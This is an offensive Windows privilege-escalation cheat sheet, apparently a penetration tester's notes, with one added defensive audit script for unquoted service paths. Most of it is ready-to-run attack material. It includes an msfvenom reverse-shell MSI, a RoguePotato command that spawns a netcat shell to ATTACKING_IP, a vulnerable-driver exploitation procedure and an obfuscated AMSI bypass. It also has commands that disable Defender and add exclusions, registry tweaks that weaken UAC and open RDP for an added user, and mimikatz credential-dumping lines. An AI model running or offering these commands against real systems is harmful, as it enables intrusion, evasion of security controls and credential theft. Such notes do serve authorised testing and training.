Windows
System enumeration
hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches with these specifics columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # look if there is other existing drives
Users enumeration
whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators
Network enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p
Antivirus and Firewall enumeration
sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # all the services running, search for AV such as sophos, avast...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old command
netsh firewall show config
Account lockout
PowerShell Enumeration
Tools
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Kernel Exploit
- https://github.com/SecWiki/windows-kernel-exploits
- https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Password Hunting
Enumerate folders
tree /f /a # in users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files
MSF
PowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear-text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
HiveNightmare
- https://github.com/GossiTheDog/HiveNightmare
Stored credentials
WSL
wsl whoami
./ubuntu1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Registry
Autorun
Always Install Elevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi
Drivers
- The driver directory is usually C:\Windows\System32\DRIVERS, but it is sometimes under "C:\Program Files". Drivers use the .inf file type.
Compile C/C++ code on Windows: https://www.mingw-w64.org/
Impersonation Privileges
Restore Privileges
- This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
- https://github.com/itm4n/FullPowers
SeImpersonatePrivilege
- https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Sweet Potato to rule them all: https://github.com/CCob/SweetPotato
- If the machine is older than Windows 10 1809 / Windows Server 2019: https://github.com/ohpe/juicy-potato/
  - test for a CLSID: https://github.com/ohpe/juicy-potato/tree/master/CLSID
- If the machine is Windows 10 1809 / Windows Server 2019 or newer:
  - https://github.com/antonioCoco/RoguePotato
# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999
- https://github.com/itm4n/PrintSpoofer
SeLoadDriver
- Explanations: https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
- Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- Exploit Capcom : https://github.com/tandasat/ExploitCapcom
Compile the files with Visual Studio (Release / x64 -> Build). Remove the include "stdafx.h" if it causes an error. First modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); that the exploit launches, replacing it with a reverse shell generated with msfvenom. Then load the vulnerable driver and run the exploit.
./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe
Unquoted Service Paths
- When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe), Windows tries to execute 'C:\Program.exe' first, then 'C:\Program Files\soft\new.exe', and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'.
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# check if running as system or admin
sc qc <service_name>
# check path
icacls <service_path>
# After creating or replacing the binary by a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0
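Added audit script, not part of the original notes: it enumerates services whose binary path is unquoted and contains spaces, lists the intermediate paths the service control manager would probe before the real binary, and flags any parent directory that grants write access to broad groups, so the path can be quoted or the ACL tightened. The function name Get-UnquotedServicePath and the $BroadGroups list are my own choices.

```powershell
# Added example: audit unquoted service paths for remediation (not from the original notes).
# Broad principals whose write access on a parent directory makes the path a real problem
# (generic, unmapped rights in an ACE are not expanded here; review those by hand).
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteMask   = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::CreateDirectories

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { return }   # empty or already quoted: fine
        # Everything up to the first ".exe" is the binary; anything after it is arguments.
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { return }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { return }                    # no space, so no ambiguity
        if ($exe -like 'C:\Windows\*') { return }            # same exclusion as the wmic one-liner above
        # Candidates the SCM would try before the real binary:
        # C:\Program.exe, then C:\Program Files\soft\new.exe, and so on.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $parent    = Split-Path -LiteralPath $candidate -Parent
            $writable  = $false
            if (Test-Path -LiteralPath $parent) {
                foreach ($ace in (Get-Acl -LiteralPath $parent).Access) {
                    if ($ace.AccessControlType -eq 'Allow' -and
                        $BroadGroups -contains $ace.IdentityReference.Value -and
                        (($ace.FileSystemRights -band $WriteMask) -ne 0)) {
                        $writable = $true
                    }
                }
            }
            [pscustomobject]@{
                Service                    = $svc.Name
                StartMode                  = $svc.StartMode
                RunsAs                     = $svc.StartName
                ImagePath                  = $exe
                Candidate                  = $candidate
                ParentWritableByBroadGroup = $writable
            }
        }
    }
}

# Any row with ParentWritableByBroadGroup = True needs the ImagePath quoted or the directory ACL fixed.
Get-UnquotedServicePath | Format-Table -AutoSize
```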
Localhost services
Chisel
- https://github.com/jpillora/chisel
Access localhost port 8888 on victim machine from attacking machine
./chisel_1.7.7_linux_amd64 server -p 9876 --reverse # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine
AMSI bypass
$a=[Ref].Assembly.GetTypes();$a | %{$b=$_; $count=0; $tmp=($_.Name).ToCharArray().ToInt32($null); $tmp | %{$count+= $_;}; if($count -eq 923){$c=$b}};$d=$c.GetFields('NonPublic,Static');$d | %{$e=$_; $count=0; $tmp=($_.Name).ToCharArray().ToInt32($null); $tmp | %{$count+= $_;}; if($count -eq 1167){$f=$e}};$o=1;while($o -lt 8){Start-Sleep -Milliseconds ($o.toInt32($null)*100);$o++};$g=$f.GetValue($null);[IntPtr]$x=$g;[Int32[]]$y=@(0);$cop=[System.Runtime.InteropServices.Marshal];$i=1;while($i -lt 5){Start-Sleep -Milliseconds ($i.toInt32($null)*100);$i++};$cop::Copy($y, 0, $x, 1);
Add admin account Windows
Add exclusions
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"
Bypass UAC
- https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Disable UAC remote restrictions
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Value 1 -Type DWord -Force
Enable RDP from CLI
- https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!
Admin to System
- https://twitter.com/cyb3rops/status/1448208520680284164
Mimikatz one liner
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"
Escape PowerShell CLM
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
    <MSBuildTest/>
  </Target>
  <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
        using System;
        using System.Linq;
        using System.Management.Automation;
        using System.Management.Automation.Runspaces;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class MSBuildTest : Task, ITask
        {
            public override bool Execute()
            {
                using (var runspace = RunspaceFactory.CreateRunspace())
                {
                    runspace.Open();
                    using (var posh = PowerShell.Create())
                    {
                        posh.Runspace = runspace;
                        posh.AddScript("$ExecutionContext.SessionState.LanguageMode");
                        var results = posh.Invoke();
                        var output = string.Join(Environment.NewLine, results.Select(r => r.ToString()).ToArray());
                        Console.WriteLine(output);
                    }
                }
                return true;
            }
        }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
PowerShell proxy related
# System.Net.WebClient is proxy-aware by default
$wc = New-Object System.Net.WebClient
$wc.DownloadString("https://your-url/test.txt")
# Check which proxy would be used for a URL
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://your-url/")
# Remove the proxy
$wc.Proxy = $null
# Add a custom user agent
$wc.Headers.Add('User-Agent', "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0")
# Discover the system proxy and authenticate to it with the current user's credentials
[System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials